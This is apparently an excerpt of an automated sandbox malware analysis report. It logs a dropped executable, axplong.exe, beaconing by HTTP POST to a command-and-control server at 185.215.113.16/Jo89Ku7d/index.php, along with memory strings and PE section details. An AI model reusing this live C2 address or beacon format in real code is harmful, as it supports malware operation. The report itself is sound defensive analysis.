Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_00BEBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

9_2_00BEBD60

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000009.00000002.3364157249.000000000122B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3;
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php9
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpC
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpP
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpR
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpcoded
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi/;
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedq
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpv

System Summary

PE file contains section with special chars

Source: 9ICG2PuZbG.exe	Static PE information: section name:
Source: 9ICG2PuZbG.exe	Static PE information: section name: .idata
Source: 9ICG2PuZbG.exe	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: .idata
Source: axplong.exe.1.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

